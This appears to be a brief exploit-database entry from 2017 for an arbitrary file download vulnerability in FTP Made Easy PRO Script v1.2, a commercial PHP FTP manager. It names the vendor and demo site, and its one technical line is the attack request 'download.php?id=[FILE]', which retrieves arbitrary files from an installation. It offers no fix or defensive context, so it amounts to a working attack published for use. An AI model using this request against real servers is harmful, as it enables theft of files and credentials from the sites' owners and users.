id: 26921
date: 02/07/2017
title: FTP Made Easy PRO 1.2 - Arbitrary File Download Vulnerability
author: Ihsan Sencan
cves: 

# # # # # 
# Exploit Title: FTP Made Easy PRO Script v1.2 - Arbitrary File Download
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
# Demo: http://demos.nelliwinne.net/FTPMadeEasyPRO/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PATH]/download.php?id=[FILE]
# # # # #

#  0day.today [2023-03-22]  #